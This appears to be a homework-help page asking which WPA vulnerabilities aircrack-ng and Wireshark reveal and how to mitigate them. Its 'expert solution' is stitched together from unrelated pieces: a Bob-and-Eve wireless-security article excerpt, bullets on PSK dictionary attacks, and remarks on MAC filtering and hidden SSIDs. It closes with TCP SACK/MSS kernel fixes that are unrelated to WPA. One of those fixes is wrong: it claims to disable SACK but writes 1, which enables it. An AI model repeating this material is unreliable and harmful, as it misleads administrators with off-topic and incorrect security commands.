Question

In: Computer Science

These questions ONLY relate to the Cracking WPA What vulnerabilities were demonstrated by using aircrack-ng? What...

These questions ONLY relate to the Cracking WPA

What vulnerabilities were demonstrated by using aircrack-ng?

What vulnerabilities were demonstrated by using aircrack-ng in Wireshark?

What would you tell the server administrator to do to mitigate the vulnerability from aircrack-ng?

What would you tell the server administrator to do to mitigate the vulnerability from Wireshark?

Solutions

Expert Solution

1. Aircrack-ng is not a single tool, but rather a suite of tools that can be used to hack a wireless network. In this article, though, it is used to secure a wireless network by discovering its vulnerabilities.

Security in networks is very vital for small as well as large organisations. Not only does it help in maintaining the confidentiality of a clients and employers data, but it is also important for retaining trade secrets to overcome competition. Wireless networks form an important mode of communication as wired networks tend to incur more infrastructure costs. But are wireless networks sufficiently secure? Lets have a look at a common scenario.

Wired Equivalent Privacy (WEP)
This algorithm is based on the RC4 stream cipher and CRC checksum mechanism to provide confidentiality and integrity. Open System authentication and Shared Key authentication are the two methods of authentication used in WEP.
1. Open System authentication: In this case, the WLAN client need not provide its credentials to the access point during authentication. Any client can authenticate with the access point.

2. Shared Key authentication: In this authentication mechanism as shown in figure 1, the WEP key is used for authentication in a four-step handshake process:
a. The client sends an authentication request to the access point.
b. The access point responds to the request with a clear-text challenge.
c. The client encrypts the challenge-text using the configured WEP key and sends the encrypted message to the access point.
d. The access point decrypts the response and verifies if the decrypted text matches the challenge-text. It authenticates the client if the match is found.
In spite of the mechanisms used, this algorithm has a number of vulnerabilities and can be easily cracked. Various techniques, based on brute force attacks and analysis of the IVs (initialisation vectors), were discovered that led to deprecation of this algorithm.

Figure 2: WPA technique

Wi-Fi Protected Access (WPA)
WPA is a more secure algorithm that was developed in 2003 to address a few of the vulnerabilities that existed in WEP. WPA is mainly based on TKIP (temporal key integrity protocol), which uses a unique encryption key for each data packet sent over the network. The pre-shared key (PSK) used in TKIP is a 256-bit entity used for authentication. Figure 2 gives diagrammatic representation of WPA algorithm.

WPA is much more secure than WEP. This is because in the case of the latter, every data packet has the same key, which can be easy to find by capturing a sufficient number of packets. In WPA, its difficult to get the key because every data packet has a unique key. But there are also a few loopholes that can be exploited. WPA can be compromised using Denial of Service attacks.

Wi-Fi Protected Access II (WPA2)
WPA2, also known as RSN (robust security network), is the most recent and highly secure algorithm, which enforces mandatory usage of the AES (advanced encryption standard). Another significant security enhancement has been the introduction of CCMP [counter mode with CBC (cipher block chaining) MAC (message authentication code) protocol]. CCMP uses AES instead of TKIP as the underlying encryption mechanism and, hence, prevents various attacks that were designed based on the RC4 cipher used in TKIP.

After some research, Eve concludes that WPA2 is secure enough to get rid of the kind of attacks Bobs office suffers from and, hence, configures the entire network over WPA2. Yet, even after such heightened countermeasures, Bobs network again gets compromised by some mischievous attackers. Alarmed at the situation, he again contacts Eve for help. During her research, she comes across one such tool that suits her needs. She advises Bob to use Aircrack-ng to internally spot the weak access points and enhance his networks security to avoid future attacks. Since Bob is unaware of the functionality of Aircrack-ng, Eve provides a brief overview.

Aircrack-ng stands for Aircrack new generation and is an advanced network auditing software used for sniffing and cracking wireless networks. It is mainly used for testing the weaknesses of wireless networks by breaking into the network using the WEP and WPA-PSK keys recovered by decrypting the gathered encrypted packets. This tool can be used across Linux as well as Windows platforms, but has limited support in Windows.

The block diagram given in Figure 3 gives a brief description of the tool.
Bob is determined to patch up the weak links in his network; so he asks Eve to demonstrate how the tool is used to prevent various attacks. Eve tells him how to install the tool on the Ubuntu 14.04 platform and then gives the procedure to detect the vulnerable access points.

2. PSK vulnerability

• In WPA the master key is used to generate transient session keys • With PSK, all devices are configured with the same passphrase (or password) that serves as the master key • Like any other password, the strength of the passphrase determines if it can be guessed using a dictionary attack • Once passphrase is guessed, an attacker can generate transient keys to decrypt all traffic • WPA-PSK and WPA2-PSK (also known as WPA-Personal, WPA2-Personal) are vulnerable to dictionary attack

3.The only way to mitigate attacks against WEP networks was to pretty much re-invent the wheel. In the meanwhile, people started implement some “restrictive” features to only allow “authorized” personnel into the networks. One of these attempts was a simple MAC Filtering technique, while WEPattack was thwarted by the use of WEP 128 and above, people still knew that hackers would get in, so they thought they would add a layer of security by only allowing MAC authorized clients to join to the network. This is a pain to actually manage, and more trouble than what it is really worth since it would take an attacker all but a few extra seconds to change their MAC address to impersonate some client who is already connected, and has authority to use the network.The attacker can now freely impersonate the other person on the network and connect to it freely, MAC filtering proved to do much of nothing at all. The next failed Mitigation technique was “Hiding SSIDs” We’ve all needed to connect to a Hidden SSID in our day, it can be somewhat inconvenient, typing the SSID name and then the password. The problem with this, is that SSIDs were not constructed to be hidden, therefore, one could fire up Wireshark, monitor the air around them, and essentially see what the SSID name is via a client connecting to it who is broadcasting probes.

4

To prevent your systems for being vulnerable to these attacks and improve their security, it is essential to apply one of the following fixes:

Fix #0: Patch your system.

Make sure you apply the latest patches available here or simply run the following command:

$ sudo apt-get dist-upgradeCOPY

Fix #1: Block connections with low MSS using filters.

These filters may break legitimate connections that rely on this setting, so practice caution when applying them.

 $ iptables -t mangle -A PREROUTING -p tcp -m conntrack --ctstate NEW -m tcpmss ! --mss 536:65535 -j DROPCOPY

Fix #2: Disable SACK processing

To do this, you have to be a superuser, because regular admin users don’t have the permission to change this value.

$ echo 1 > /proc/sys/net/ipv4/tcp_sack

Related Solutions

) What were the main vulnerabilities of the U.S. financial system prior to the 2007-2009 financial...
) What were the main vulnerabilities of the U.S. financial system prior to the 2007-2009 financial crisis?
What were the findings of the Loftus & Palmer (1975) study? How do they relate to...
What were the findings of the Loftus & Palmer (1975) study? How do they relate to your findings?
1-5 The following five questions relate independent events. Using the audit risk model as a guide,...
1-5 The following five questions relate independent events. Using the audit risk model as a guide, determine the effect the event has on risk or evidence collected. 1) The client’s management materially increased contractual debt. The effect this has on    control risk is          A) decrease                                                         B) no effect          C) cannot be determine                                     D) increase 2) The account balance increased materially from the preceding year without apparent reason. The effect this has is to          A) increase inherent risk                                   ...
What were Rizzut and Fratiglioni (2014) findings in regards to lifestyle factors that relate to mortality...
What were Rizzut and Fratiglioni (2014) findings in regards to lifestyle factors that relate to mortality and survival?
Answer the following questions from you knowledge in microeconomic theory: A.      Show, using only the industry...
Answer the following questions from you knowledge in microeconomic theory: A.      Show, using only the industry demand and long-run supply curves (for an increasing cost industry), the effects on price and output of an excise subsidy paid to the firms. Who benefits from the subsidy? B.      Can you think of any type of subsidy that, if given to firms in a competitive market, would in the long run benefit (the owners of) the firms? Why wouldn’t entry of new firms...
Please use ONLY one Excel file to answer the below questions. ( including the formula using...
Please use ONLY one Excel file to answer the below questions. ( including the formula using for Excel) In 2011, when the Gallup organization polled investors, 34% rated gold the best long-term investment. In April of 2013 Gallup surveyed a random sample of U.S. adults. Respondents were asked to select the best long-term investment from a list of possibilities. Only 241 of the 1005 respondents chose gold as the best long-term investment. By contrast, only 91 chose bonds. Compute the...
Relate these questions and your responses to types of “market failure.” 1. What role do you...
Relate these questions and your responses to types of “market failure.” 1. What role do you think government should play in our economic system to maximize the wellbeing of our citizens? Provide specific examples of when you think government involvement is warranted to improve the answers to the 3 main economic questions.
What would be the impact on world trade and investment if there were only one, universal...
What would be the impact on world trade and investment if there were only one, universal currency? What would be the advantages and disadvantages of such an arrangement?
1. What if only 5 people were at the conference? a. Draw a graph (vertices and...
1. What if only 5 people were at the conference? a. Draw a graph (vertices and edges: pg. 3, example #1) that pictures this situation. b. Explain the total number of handshakes for the 5 people based on the graph. Explain how you use the graph to find the number of handshakes. c. Draw a tree to picture this situation (pg. 4, example #2) d. Explain the total number of handshakes for the 5 people based on the tree. Explain...
Answer the following questions using the NYC2br.MTW file. Data were collected from a random sample of...
Answer the following questions using the NYC2br.MTW file. Data were collected from a random sample of two-bedroom apartments posted on Apartments.com in Manhattan and Brooklyn. A. What is one type of graph that could be used to compare the monthly rental rates of these two-bedroom apartments in Manhattan and Brooklyn? Explain why this is an appropriate graph. B. Using Minitab Express, Construct the graph you described in part A to compare the Manhattan and Brooklyn apartments in this sample. C....
ADVERTISEMENT
ADVERTISEMENT
ADVERTISEMENT